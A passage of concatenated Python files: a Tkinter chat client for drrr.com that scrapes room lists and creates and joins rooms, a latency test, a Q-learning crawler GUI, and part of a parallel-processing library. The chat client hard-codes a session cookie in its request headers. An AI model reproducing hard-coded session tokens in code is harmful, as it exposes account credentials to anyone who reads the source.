text='''登陆''',
width=45,)
self.UserLabel = tk.Label(self.loginPage)
self.UserLabel.place(relx=0.038, rely=0.23, height=23, width=42)
self.UserLabel.configure(activebackground="#000000",
activeforeground="white",
background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
text='''用户名''',)
self.RoomLabel = tk.Label(self.loginPage)
self.RoomLabel.place(relx=0.038, rely=0.59, height=23, width=42)
self.RoomLabel.configure(background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
text='''房间名''',)
self.appLabel = tk.Label(self.loginPage)
self.appLabel.place(relx=0.307, rely=0.044, height=33, width=97)
self.appLabel.configure(background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
text='''DOLLARS''',
font=font,
width=97,)
def login(self, event=None):
self.userName = self.userNameEntry.get()
self.roomName = self.roomChooseEntry.get()
if self.userName == '' or self.roomName == '':
tkinter.messagebox.showerror("错误", "用户名/房间名 信息不完整")
else:
self.roomName, self.roomId, self.session= main_part.login(self.userName, self.roomName, self.roomInfos)
if self.roomName and self.roomId:
self.loginPage.destroy()
self.show_room(self.roomName)
def show_room(self, roomName):
threading.Thread(target=self.save_users).start()
self.root.geometry('528x452+526+169')
chatRoom = tk.Frame(master=self.root, height=453, width=528, bg='black')
chatRoom.place(relx=0.0, rely=0.0, relheight=1.007, relwidth=1.013)
chatRoom.pack()
self.root.title(roomName)
entry = tk.StringVar()
self.Entry = tk.Entry(chatRoom, textvariable=entry)
self.Entry.place(relx=0.019, rely=0.911, height=27, relwidth=0.568)
self.Entry.configure(background="black",
disabledforeground="#a3a3a3",
font="TkFixedFont",
foreground="#ffffff",
highlightbackground="#d9d9d9",
highlightcolor="black",
insertbackground="white",
selectbackground="#c4c4c4",
selectforeground="black")
self.Entry.bind('<Return>', self.button)
self.postButton = tk.Button(chatRoom, command=self.button)
self.postButton.place(relx=0.019, rely=0.824, height=28, width=299)
self.postButton.configure(activebackground="#ececec",
activeforeground="#000000",
background="#ffffff",
disabledforeground="#a3a3a3",
foreground="#000000",
highlightbackground="#d9d9d9",
highlightcolor="black",
pady="0",
relief='groove',
text='''发送''',)
self.getMessageText = tk.Text(chatRoom)
self.getMessageText.configure(background='#000000')
self.getMessageText.place(relx=0.019, rely=0.022, relheight=0.777, relwidth=0.568)
self.roomListLabel = tk.Label(chatRoom)
self.roomListLabel.place(relx=0.606, rely=0.022, height=25, width=194)
self.roomListLabel.configure(activebackground="#f9f9f9",
activeforeground="black",
background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
highlightbackground="#d9d9d9",
highlightcolor="black",
relief='groove',
text='''房间列表''',)
self.roomListLabel.bind('<Button-1>', self.create_room_thread)
self.roomListbox = tk.Listbox(chatRoom)
self.roomListbox.place(relx=0.606, rely=0.088, relheight=0.5, relwidth=0.367)
self.roomListbox.configure(background="#000000",
disabledforeground="#a3a3a3",
font="TkFixedFont",
foreground="#ffffff",
highlightbackground="#d9d9d9",
highlightcolor="black",
relief='groove',
selectbackground="#c4c4c4",
selectforeground="black",
width=194,)
self.roomListbox.bind('<Double-Button-1>', self.join_new_room)
self.memberLabel = tk.Label(chatRoom)
self.memberLabel.place(relx=0.606, rely=0.597, height=25, width=194)
self.memberLabel.configure(activebackground="#f9f9f9",
activeforeground="black",
background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
highlightbackground="#d9d9d9",
highlightcolor="black",
relief='groove',
text='''成员列表''',)
self.memberListbox = tk.Listbox(chatRoom)
self.memberListbox.place(relx=0.606, rely=0.664, relheight=0.31, relwidth=0.367)
self.memberListbox.configure(background="#000000",
disabledforeground="#a3a3a3",
font="TkFixedFont",
foreground="#ffffff",
highlightbackground="#d9d9d9",
highlightcolor="black",
selectbackground="#c4c4c4",
selectforeground="black",
width=194,)
main_part.get_message_thread(self.userName, self.getMessageText, self.roomId, self.memberListbox, self.queue)
main_part.get_room_thread(self.roomListbox)
def button(self, event=None):
message = self.Entry.get()
main_part.post_message(self.roomId, message, self.Entry, self.root)
def get_rooms_thread(self):
room_thread = threading.Thread(target=self.get_rooms)
room_thread.setDaemon(True)
room_thread.start()
def get_rooms(self):
headers = {
'accept': 'application/json, text/javascript, */*; q=0.01',
'accept-language': 'zh-CN,zh;q=0.9',
'referer': 'https://drrr.com/lounge',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
'x-requested-with': 'XMLHttpRequest',
'cookie': '__cfduid=d0f2d37f03823a2fce2f58a60c43218c61547450103;drrr-session-1=q57dhbunjsjq5a0st60ulvmf17'
}
roomUrl = 'https://drrr.com/lounge?api=json'
response = requests.get(url=roomUrl, headers=headers).text
self.roomInfos = json.loads(response)['rooms']
roomNames = [roomInfo['name'] for roomInfo in self.roomInfos
if roomInfo['language'] == 'zh-CN' and roomInfo['limit'] != roomInfo['total']]
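        # Keep only zh-CN rooms that still have free slots (limit != total); all other lounges are
        # dropped from the combobox suggestions.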
try:
self.roomChooseEntry['values'] = roomNames
except:
pass
def get_users_thread(self):
user_thread = threading.Thread(target=self.get_users)
user_thread.setDaemon(True)
user_thread.start()
def get_users(self):
with open('./users.txt', 'a+') as f:
f.seek(0)
content = f.read()
if content != '':
self.names_list = json.loads(content)
self.userNameEntry['values'] = self.names_list
def save_users(self):
if self.userName not in self.names_list:
self.names_list.append(self.userName)
with open('./users.txt', 'w+') as f:
f.write(json.dumps(self.names_list))
def join_new_room(self, event=None):
value = self.roomListbox.get(self.roomListbox.curselection()[0])
        roomName = re.search(r'<(.*?) (\d/\d)>', value).group(1)
join_header = {
'Host': 'drrr.com',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Referer': 'https://drrr.com/lounge/',
}
room = self.session.get('https://drrr.com/lounge?api=json', headers=join_header)
room_id = None
rooms = json.loads(room.text)['rooms']
for room in rooms:
if room['name'] == roomName:
room_id = room['roomId']
if room_id:
data = {
'message': '/leave',
'url': '',
'to': '',
}
session_headers = {
'authority': 'drrr.com',
'method': 'POST',
'path': '/room/?ajax=1',
'scheme': 'https',
'accept': '*/*',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'zh-CN,zh;q=0.9',
'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'origin': 'https://drrr.com',
'referer': None,
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
'x-requested-with': 'XMLHttpRequest',
}
post_message_url = 'https://drrr.com/room/?ajax=1'
while True:
response = self.session.post(url=post_message_url, headers=session_headers, data=data)
if response.status_code == 200:
break
time.sleep(2)
main_part.join(room_id)
self.queue.put_nowait('stop')
self.root.title(roomName)
main_part.get_message_thread(self.userName, self.getMessageText, room_id, self.memberListbox, self.queue)
else:
tkinter.messagebox.showerror('错误', '房间名不存在')
def create_room_thread(self, event=None):
threading.Thread(target=self.create_room).start()
def create_room(self):
create_root = tk.Tk()
create_root.geometry("330x216+525+285")
create_root.title("创建房间")
create_root.iconbitmap('./drrr.ico')
create_root.configure(background="#000000")
roomName = tk.StringVar()
roomNameEntry = tk.Entry(create_root, textvariable=roomName)
roomNameEntry.place(relx=0.258, rely=0.278, height=23, relwidth=0.467)
roomNameEntry.configure(background="white",
disabledforeground="#a3a3a3",
font="TkFixedFont",
foreground="#000000",
insertbackground="black",
width=154,)
count = tk.StringVar()
countCombobox = ttk.Combobox(create_root, textvariable=count)
countCombobox.place(relx=0.258, rely=0.648, relheight=0.106, relwidth=0.467)
countCombobox['values'] = [i for i in range(2,21)]
music = tk.IntVar()
musicCheckbutton = tk.Checkbutton(create_root, variable=music,)
musicCheckbutton.place(relx=0.773, rely=0.255, relheight=0.125, relwidth=0.194)
musicCheckbutton.configure(activebackground="#000000",
activeforeground="#ffffff",
background="#000000",
disabledforeground="#000000",
foreground="#ffffff",
highlightbackground="#000000",
highlightcolor="black",
selectcolor='black',
justify='left',
text='''音乐房''', )
adult = tk.IntVar()
adultCheckbutton = tk.Checkbutton(create_root, variable=adult,)
adultCheckbutton.place(relx=0.773, rely=0.463, relheight=0.125, relwidth=0.194)
adultCheckbutton.configure(activebackground="#000000",
activeforeground="#ffffff",
background="#000000",
disabledforeground="#000000",
foreground="#ffffff",
highlightbackground="#000000",
highlightcolor="black",
selectcolor='black',
justify='left',
text='''成人室''', )
hidden = tk.IntVar()
hiddenCheckbutton = tk.Checkbutton(create_root, variable=hidden)
hiddenCheckbutton.place(relx=0.773, rely=0.648, relheight=0.125, relwidth=0.23)
hiddenCheckbutton.configure(activebackground="#000000",
activeforeground="#ffffff",
background="#000000",
disabledforeground="#000000",
foreground="#ffffff",
highlightbackground="#000000",
highlightcolor="black",
selectcolor='black',
justify='left',
text='''隐藏房间''', )
roomNameLabel = tk.Label(create_root)
roomNameLabel.place(relx=0.061, rely=0.255, height=23, width=54)
roomNameLabel.configure(background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
text='''房间名称''')
descriptionLabel = tk.Label(create_root)
descriptionLabel.place(relx=0.061, rely=0.486, height=23, width=54)
descriptionLabel.configure(background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
text='''房间描述''',)
countLabel = tk.Label(create_root)
countLabel.place(relx=0.061, rely=0.648, height=23, width=54)
countLabel.configure(background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
text='''成员人数''',)
createButton = tk.Button(create_root, command=lambda: self.create_room_(roomName=roomNameEntry.get(),
description=descriptionEntry.get(),
limit=countCombobox.get(),
language='zh-CN',
music=music.get(),
root=create_root))
createButton.place(relx=0.409, rely=0.833, height=28, width=49)
createButton.configure(activebackground="#ececec",
activeforeground="#000000",
background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
highlightbackground="#d9d9d9",
highlightcolor="black",
pady="0",
relief='groove',
text='''创建''',)
descriptionEntry = tk.Entry(create_root)
descriptionEntry.place(relx=0.258, rely=0.463, height=23, relwidth=0.467)
descriptionEntry.configure(background="white",
disabledforeground="#a3a3a3",
font="TkFixedFont",
foreground="#000000",
highlightbackground="#d9d9d9",
highlightcolor="black",
insertbackground="black",
selectbackground="#c4c4c4",
selectforeground="black",)
font9 = "-family {Microsoft YaHei UI} -size 11 -weight bold " \
"-slant roman -underline 0 -overstrike 0"
createLabel = tk.Label(create_root)
createLabel.place(relx=0.379, rely=0.069, height=25, width=76)
createLabel.configure(background="#000000",
disabledforeground="#a3a3a3",
font=font9,
foreground="#ffffff",
text='''DOLLARS''', )
create_root.mainloop()
def create_room_(self, roomName, description, limit, language, music, root):
data = {
'message': '/leave',
'url': '',
'to': '',
}
session_headers = {
'authority': 'drrr.com',
'method': 'POST',
'path': '/room/?ajax=1',
'scheme': 'https',
'accept': '*/*',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'zh-CN,zh;q=0.9',
'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'origin': 'https://drrr.com',
'referer': None,
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
'x-requested-with': 'XMLHttpRequest',
}
post_message_url = 'https://drrr.com/room/?ajax=1'
while True:
response = self.session.post(url=post_message_url, headers=session_headers, data=data)
if response.status_code == 200:
break
time.sleep(2)
main_part.create_room(name=roomName,
description=description,
limit=limit,
language=language,
music=music)
data = {
'name': roomName,
'description': description,
'limit': limit,
'language': language,
'submit': '创建房间'
}
        if music == 1:
music = 'true'
data.update({'music': music})
create_headers = {
'authority': 'drrr.com',
'method': 'POST',
'path': '/create_room/?',
'scheme': 'https',
            'cache-control': 'max-age=0',
'accept': '*/*',
'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'origin': 'https://drrr.com',
'referer': 'https://drrr.com/create_room/?',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
'x-requested-with': 'XMLHttpRequest',
}
create_url = 'https://drrr.com/create_room/?'
response = self.session.post(url=create_url, data=data, headers=create_headers, allow_redirects=False)
if response.status_code == 302:
url = 'https://drrr.com/room/'
join_headers = {
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Referer': 'https://drrr.com/lounge',
'Accept-Language': 'zh-CN,zh;q=0.9',
}
response = self.session.get(url, headers=join_headers).text
room_id = re.search('data-url=".*id=(.*?)"', response).group(1)
self.queue.put_nowait('stop')
self.root.title(roomName)
root.destroy()
main_part.get_message_thread(self.userName, self.getMessageText, room_id, self.memberListbox, self.queue)
else:
tk.messagebox.showerror('错误', '房间名已存在')
|
server_latency_test.py
|
import threading
from time import time
from network import receive, send
class ServerLatencyTest:
def __init__(self, to_client_connections: dict, from_client_connections: dict) -> None:
self._to_client_connections = to_client_connections
self._from_client_connections = from_client_connections
self._latencies = {}
def run(self):
data = {
"type": "request",
"request": "timestamp"
}
threads = []
for from_client_connection, client_name in self._from_client_connections.items():
to_client_connection = self._to_client_connections[client_name]
latency_thread = threading.Thread(target=self._get_timestamp_difference, args=(data, client_name, to_client_connection, from_client_connection))
threads.append(latency_thread)
for latency_thread in threads:
latency_thread.start()
for latency_thread in threads:
latency_thread.join()
for client_name, time_difference in self._latencies.items():
print(f"{client_name}: {time_difference}")
def _get_timestamp_difference(self, data, client_name, to_client_connection, from_client_connection):
send([to_client_connection], data)
[data] = receive([from_client_connection])
if data["type"] == "state":
self._latencies[client_name] = time() - data["state"]
else:
raise RuntimeError("Cannot handle data of type: " + data["type"])
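
# Illustrative client-side counterpart (a sketch added for clarity, not part of the
# original module): it assumes the client uses the same `network.send`/`network.receive`
# helpers and answers a timestamp request with the current time, which is what
# ServerLatencyTest expects back as a "state" message.
def answer_latency_probe(to_server_connection, from_server_connection):
    [request] = receive([from_server_connection])
    if request.get("type") == "request" and request.get("request") == "timestamp":
        send([to_server_connection], {"type": "state", "state": time()})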
|
graphicsCrawlerDisplay.py
|
# graphicsCrawlerDisplay.py
# -------------------------
import Tkinter
import pendulum as pendulum
import qlearningAgents
import time
import threading
import sys
import crawler
# import pendulum
import math
from math import pi as PI
robotType = 'crawler'
class Application:
def sigmoid(self, x):
return 1.0 / (1.0 + 2.0 ** (-x))
def incrementSpeed(self, inc):
self.tickTime *= inc
# self.epsilon = min(1.0, self.epsilon)
# self.epsilon = max(0.0,self.epsilon)
# self.learner.setSpeed(self.epsilon)
self.speed_label['text'] = 'Step Delay: %.5f' % (self.tickTime)
def incrementEpsilon(self, inc):
self.ep += inc
self.epsilon = self.sigmoid(self.ep)
self.learner.setEpsilon(self.epsilon)
self.epsilon_label['text'] = 'Epsilon: %.3f' % (self.epsilon)
def incrementGamma(self, inc):
self.ga += inc
self.gamma = self.sigmoid(self.ga)
self.learner.setDiscount(self.gamma)
self.gamma_label['text'] = 'Discount: %.3f' % (self.gamma)
def incrementAlpha(self, inc):
self.al += inc
self.alpha = self.sigmoid(self.al)
self.learner.setLearningRate(self.alpha)
self.alpha_label['text'] = 'Learning Rate: %.3f' % (self.alpha)
def __initGUI(self, win):
## Window ##
self.win = win
## Initialize Frame ##
win.grid()
self.dec = -.5
self.inc = .5
self.tickTime = 0.1
## Epsilon Button + Label ##
self.setupSpeedButtonAndLabel(win)
self.setupEpsilonButtonAndLabel(win)
## Gamma Button + Label ##
self.setUpGammaButtonAndLabel(win)
## Alpha Button + Label ##
self.setupAlphaButtonAndLabel(win)
## Exit Button ##
# self.exit_button = Tkinter.Button(win,text='Quit', command=self.exit)
# self.exit_button.grid(row=0, column=9)
## Simulation Buttons ##
# self.setupSimulationButtons(win)
## Canvas ##
self.canvas = Tkinter.Canvas(root, height=200, width=1000)
self.canvas.grid(row=2, columnspan=10)
def setupAlphaButtonAndLabel(self, win):
self.alpha_minus = Tkinter.Button(win,
text="-", command=(lambda: self.incrementAlpha(self.dec)))
self.alpha_minus.grid(row=1, column=3, padx=10)
self.alpha = self.sigmoid(self.al)
self.alpha_label = Tkinter.Label(win, text='Learning Rate: %.3f' % (self.alpha))
self.alpha_label.grid(row=1, column=4)
self.alpha_plus = Tkinter.Button(win,
text="+", command=(lambda: self.incrementAlpha(self.inc)))
self.alpha_plus.grid(row=1, column=5, padx=10)
def setUpGammaButtonAndLabel(self, win):
self.gamma_minus = Tkinter.Button(win,
text="-", command=(lambda: self.incrementGamma(self.dec)))
self.gamma_minus.grid(row=1, column=0, padx=10)
self.gamma = self.sigmoid(self.ga)
self.gamma_label = Tkinter.Label(win, text='Discount: %.3f' % (self.gamma))
self.gamma_label.grid(row=1, column=1)
self.gamma_plus = Tkinter.Button(win,
text="+", command=(lambda: self.incrementGamma(self.inc)))
self.gamma_plus.grid(row=1, column=2, padx=10)
def setupEpsilonButtonAndLabel(self, win):
self.epsilon_minus = Tkinter.Button(win,
text="-", command=(lambda: self.incrementEpsilon(self.dec)))
self.epsilon_minus.grid(row=0, column=3)
self.epsilon = self.sigmoid(self.ep)
self.epsilon_label = Tkinter.Label(win, text='Epsilon: %.3f' % (self.epsilon))
self.epsilon_label.grid(row=0, column=4)
self.epsilon_plus = Tkinter.Button(win,
text="+", command=(lambda: self.incrementEpsilon(self.inc)))
self.epsilon_plus.grid(row=0, column=5)
def setupSpeedButtonAndLabel(self, win):
self.speed_minus = Tkinter.Button(win,
text="-", command=(lambda: self.incrementSpeed(.5)))
self.speed_minus.grid(row=0, column=0)
self.speed_label = Tkinter.Label(win, text='Step Delay: %.5f' % (self.tickTime))
self.speed_label.grid(row=0, column=1)
self.speed_plus = Tkinter.Button(win,
text="+", command=(lambda: self.incrementSpeed(2)))
self.speed_plus.grid(row=0, column=2)
def skip5kSteps(self):
self.stepsToSkip = 5000
def __init__(self, win):
self.ep = 0
self.ga = 2
self.al = 2
self.stepCount = 0
## Init Gui
self.__initGUI(win)
# Init environment
if robotType == 'crawler':
self.robot = crawler.CrawlingRobot(self.canvas)
self.robotEnvironment = crawler.CrawlingRobotEnvironment(self.robot)
elif robotType == 'pendulum':
self.robot = pendulum.PendulumRobot(self.canvas)
self.robotEnvironment = \
pendulum.PendulumRobotEnvironment(self.robot)
else:
raise Exception("Unknown RobotType")
# Init Agent
simulationFn = lambda agent: \
simulation.SimulationEnvironment(self.robotEnvironment, agent)
actionFn = lambda state: \
self.robotEnvironment.getPossibleActions(state)
self.learner = qlearningAgents.QLearningAgent(actionFn=actionFn)
self.learner.setEpsilon(self.epsilon)
self.learner.setLearningRate(self.alpha)
self.learner.setDiscount(self.gamma)
# Start GUI
self.running = True
self.stopped = False
self.stepsToSkip = 0
self.thread = threading.Thread(target=self.run)
self.thread.start()
def exit(self):
self.running = False
for i in range(5):
if not self.stopped:
time.sleep(0.1)
try:
self.win.destroy()
except:
pass
sys.exit(0)
def step(self):
self.stepCount += 1
state = self.robotEnvironment.getCurrentState()
actions = self.robotEnvironment.getPossibleActions(state)
        if len(actions) == 0:
self.robotEnvironment.reset()
state = self.robotEnvironment.getCurrentState()
actions = self.robotEnvironment.getPossibleActions(state)
print 'Reset!'
action = self.learner.getAction(state)
        if action is None:
raise Exception('None action returned: Code Not Complete')
nextState, reward = self.robotEnvironment.doAction(action)
self.learner.observeTransition(state, action, nextState, reward)
def animatePolicy(self):
if robotType != 'pendulum':
raise Exception('Only pendulum can animatePolicy')
totWidth = self.canvas.winfo_reqwidth()
totHeight = self.canvas.winfo_reqheight()
length = 0.48 * min(totWidth, totHeight)
x, y = totWidth - length - 30, length + 10
angleMin, angleMax = self.robot.getMinAndMaxAngle()
velMin, velMax = self.robot.getMinAndMaxAngleVelocity()
if not 'animatePolicyBox' in dir(self):
self.canvas.create_line(x, y, x + length, y)
self.canvas.create_line(x + length, y, x + length, y - length)
self.canvas.create_line(x + length, y - length, x, y - length)
self.canvas.create_line(x, y - length, x, y)
self.animatePolicyBox = 1
self.canvas.create_text(x + length / 2, y + 10, text='angle')
self.canvas.create_text(x - 30, y - length / 2, text='velocity')
self.canvas.create_text(x - 60, y - length / 4, text='Blue = kickLeft')
self.canvas.create_text(x - 60, y - length / 4 + 20, text='Red = kickRight')
self.canvas.create_text(x - 60, y - length / 4 + 40, text='White = doNothing')
angleDelta = (angleMax - angleMin) / 100
velDelta = (velMax - velMin) / 100
for i in range(100):
angle = angleMin + i * angleDelta
for j in range(100):
vel = velMin + j * velDelta
state = self.robotEnvironment.getState(angle, vel)
max, argMax = None, None
if not self.learner.seenState(state):
argMax = 'unseen'
else:
for action in ('kickLeft', 'kickRight', 'doNothing'):
qVal = self.learner.getQValue(state, action)
if max == None or qVal > max:
max, argMax = qVal, action
if argMax != 'unseen':
if argMax == 'kickLeft':
color = 'blue'
elif argMax == 'kickRight':
color = 'red'
elif argMax == 'doNothing':
color = 'white'
dx = length / 100.0
dy = length / 100.0
x0, y0 = x + i * dx, y - j * dy
self.canvas.create_rectangle(x0, y0, x0 + dx, y0 + dy, fill=color)
def run(self):
self.stepCount = 0
self.learner.startEpisode()
while True:
minSleep = .01
tm = max(minSleep, self.tickTime)
time.sleep(tm)
self.stepsToSkip = int(tm / self.tickTime) - 1
if not self.running:
self.stopped = True
return
for i in range(self.stepsToSkip):
self.step()
self.stepsToSkip = 0
self.step()
# self.robot.draw()
self.learner.stopEpisode()
def start(self):
self.win.mainloop()
def run():
global root
root = Tkinter.Tk()
root.title('Crawler GUI')
root.resizable(0, 0)
# root.mainloop()
app = Application(root)
def update_gui():
app.robot.draw(app.stepCount, app.tickTime)
root.after(10, update_gui)
update_gui()
root.protocol('WM_DELETE_WINDOW', app.exit)
try:
app.start()
except:
app.exit()
|
parallel_processor.py
|
"""
ParallelProcessor utilizes multiple CPU cores to process compute-intensive tasks.
If you have some time-consuming statements in a for-loop and no state is shared between iterations, you can map these
statements to different processes. Assume you need to process a couple of files; you can do this in parallel::
def mapper(filename):
        with open(filename) as f_in, open(filename + '.out', 'w') as f_out:
f_out.write(process_a_file(f_in.read()))
pp = ParallelProcessor(2, mapper)
pp.start()
for fname in ['file1', 'file2', 'file3', 'file4']:
pp.add_task(fname)
pp.task_done()
pp.join()
You do not have to write a cumbersome loop if you already have an iterable object (list, generator, etc.).
Instead, you can use `map`::
pp = ParallelProcessor(2, mapper)
pp.start()
pp.map(['file1', 'file2', 'file3', 'file4'])
pp.task_done()
pp.join()
Usually some files are small and some are big, so it is better to keep all cores busy.
One way is to send the content line by line to each process (assuming the content is line-separated)::
def mapper(line, _idx):
with open('processed_{}.out'.format(_idx), 'a') as f_out:
f_out.write(process_a_line(line))
pp = ParallelProcessor(2, mapper, enable_process_id=True)
pp.start()
for fname in ['file1', 'file2', 'file3', 'file4']:
with open(fname) as f_in:
for line in f_in:
pp.add_task(line)
pp.task_done()
pp.join()
One problem here is that a file descriptor has to be acquired every time the mapper is called.
To avoid this, use a Mapper class instead of a mapper function.
It allows the user to define how the process is constructed and deconstructed::
class MyMapper(Mapper):
def enter(self):
self.f = open('processed_{}.out'.format(self._idx), 'w')
def exit(self, *args, **kwargs):
self.f.close()
def process(self, line):
self.f.write(process_a_line(line))
pp = ParallelProcessor(..., mapper=MyMapper, ...)
In some situations, you may need a `collector` to collect data back from the child processes to the main process::
processed = []
def mapper(line):
return process_a_line(line)
def collector(data):
processed.append(data)
pp = ParallelProcessor(2, mapper, collector=collector)
pp.start()
for fname in ['file1', 'file2', 'file3', 'file4']:
with open(fname) as f_in:
for line in f_in:
pp.add_task(line)
pp.task_done()
pp.join()
print(processed)
You can count the `collector` invocations to estimate the progress. To get the progress of the mapper, \
create a progress function and set it in `ParallelProcessor`::
def progress(p):
# print('Total task: {}, Added to queue: {}, Mapper Loaded: {}, Mapper Processed {}'.format(
# p['total'], p['added'], p['loaded'], p['processed']))
if p['processed'] % 10 == 0:
print('Progress: {}%'.format(100.0 * p['processed'] / p['total']))
pp = ParallelProcessor(8, mapper=mapper, progress=progress, progress_total=len(tasks))
pp.start()
for t in tasks:
pp.add_task(t)
"""
import multiprocess as mp
import threading
import queue
import inspect
import sys
import typing
from typing import Callable, Iterable
from pyrallel import Paralleller
if sys.version_info >= (3, 8):
from pyrallel import ShmQueue
class Mapper(object):
"""
Mapper class.
This defines how mapper works.
The methods will be called in following order::
enter (one time) -> process (many times) -> exit (one time)
"""
def __init__(self, idx):
self._idx = idx
self._progress_info = ProgressThread.init_mapper_progress_info()
def __enter__(self):
self.enter()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.exit(exc_type, exc_val, exc_tb)
def enter(self):
"""
        Invoked when the subprocess is created and starts listening on the queue.
"""
pass
def exit(self, *args, **kwargs):
"""
        Invoked when the subprocess is about to exit. The arguments are set if an exception occurred.
"""
pass
def process(self, *args, **kwargs):
"""
Same as mapper function, but `self` argument can provide additional context (e.g., `self._idx`).
"""
raise NotImplementedError
class CollectorThread(threading.Thread):
"""
Handle collector in main process.
Create a thread and call ParallelProcessor.collect().
"""
def __init__(self, instance, collector):
super(CollectorThread, self).__init__()
self.collector = collector
self.instance = instance
def run(self):
for batched_collector in self.instance.collect():
for o in batched_collector:
self.collector(*o)
class ProgressThread(threading.Thread):
"""
Progress information in main process.
"""
P_ADDED = 0
P_LOADED = 1
P_PROCESSED = 2
P_TOTAL = 3
def __init__(self, instance, progress, progress_total, num_of_processor):
super(ProgressThread, self).__init__()
self.progress_info = {
ProgressThread.P_ADDED: 0,
ProgressThread.P_LOADED: 0,
ProgressThread.P_PROCESSED: 0,
ProgressThread.P_TOTAL: progress_total
}
self.mapper_progress_info = [ProgressThread.init_mapper_progress_info() for _ in range(num_of_processor)]
self.instance = instance
self.progress = progress
@staticmethod
def init_mapper_progress_info():
return {ProgressThread.P_LOADED: 0, ProgressThread.P_PROCESSED: 0}
def refresh_progress_info(self):
self.progress_info[ProgressThread.P_LOADED] \
= sum([p[ProgressThread.P_LOADED] for p in self.mapper_progress_info])
self.progress_info[ProgressThread.P_PROCESSED] \
= sum([p[ProgressThread.P_PROCESSED] for p in self.mapper_progress_info])
def run(self):
for idx, mapper_progress_info in self.instance.get_progress():
self.mapper_progress_info[idx] = mapper_progress_info
self.refresh_progress_info()
progress_info = {
'added': self.progress_info[ProgressThread.P_ADDED],
'loaded': self.progress_info[ProgressThread.P_LOADED],
'processed': self.progress_info[ProgressThread.P_PROCESSED],
'total': self.progress_info[ProgressThread.P_TOTAL],
}
self.progress(progress_info)
class ParallelProcessor(Paralleller):
"""
Args:
num_of_processor (int): Number of processes to use.
mapper (Callable / Mapper): Function or subclass of `Mapper` class.
max_size_per_mapper_queue (int, optional): Maximum size of mapper queue for one process.
If it's full, the corresponding process will be blocked.
0 by default means unlimited.
        collector (Callable, optional): If the collected data needs to be received in the main process
                            (in a separate thread), set this handler; its arguments are the same as the
                            return value of the mapper. Results are delivered one by one, in arbitrary order.
max_size_per_collector_queue (int, optional): Maximum size of collector queue for one process.
If it's full, the corresponding process will be blocked.
0 by default means unlimited.
enable_process_id (bool, optional): If it's true, an additional argument `_idx` (process id) will be
passed to `mapper` function. This has no effect for `Mapper` class.
It defaults to False.
batch_size (int, optional): Batch size, defaults to 1.
progress (Callable, optional): Progress function, which takes a dictionary as input.
                            The dictionary contains the following keys: `total` can be set by `progress_total`,
                            `added` is the number of tasks that have been added to the queue,
                            `loaded` is the number of tasks that have been loaded by worker processes,
                            `processed` is the number of tasks that have been processed by worker processes.
Defaults to None.
progress_total (int, optional): Total number of tasks. Defaults to None.
use_shm (bool, optional): When True, and when running on Python version 3.8 or later,
use ShmQueue for higher performance. Defaults to False.
enable_collector_queues (bool, optional): When True, create a collector queue for each
processor. When False, do not allocate collector queues, saving
resources. Defaults to True.
single_mapper_queue (bool, optional): When True, allocate a single mapper queue that will
be shared between the worker processes. Sending processes can
go to sleep when the mapper queue is full. When False, each process
gets its own mapper queue, and CPU-intensive polling may be needed to
find a mapper queue which can accept a new request.
Note:
        - Do NOT implement heavy compute-intensive operations in the collector; they belong in the mapper.
        - Tuning the queue sizes and the batch size can improve performance considerably.
        - `collector` only collects return values from `mapper` or `Mapper.process`.
        - How often the `progress` function is called depends on the CPU.
        - A minimal usage sketch is appended at the bottom of this module.
"""
# Command format in queue. Represent in tuple.
# The first element of tuple will be command, the rests are arguments or data.
# (CMD_XXX, args...)
CMD_DATA = 0
CMD_STOP = 1
QSTATS_ON = 0
QSTATS_OFF = 1
def __init__(self, num_of_processor: int, mapper: Callable, max_size_per_mapper_queue: int = 0,
collector: Callable = None, max_size_per_collector_queue: int = 0,
enable_process_id: bool = False, batch_size: int = 1, progress=None, progress_total = None,
use_shm=False, enable_collector_queues=True,
single_mapper_queue: bool = False):
self.num_of_processor = num_of_processor
self.single_mapper_queue = single_mapper_queue
if sys.version_info >= (3, 8):
self.collector_queues: typing.Optional[typing.Union[ShmQueue, mp.Queue]]
else:
self.collector_queues: typing.Optional[mp.Queue]
if use_shm:
if sys.version_info >= (3, 8):
if single_mapper_queue:
self.mapper_queues = [ShmQueue(maxsize=max_size_per_mapper_queue * num_of_processor)]
else:
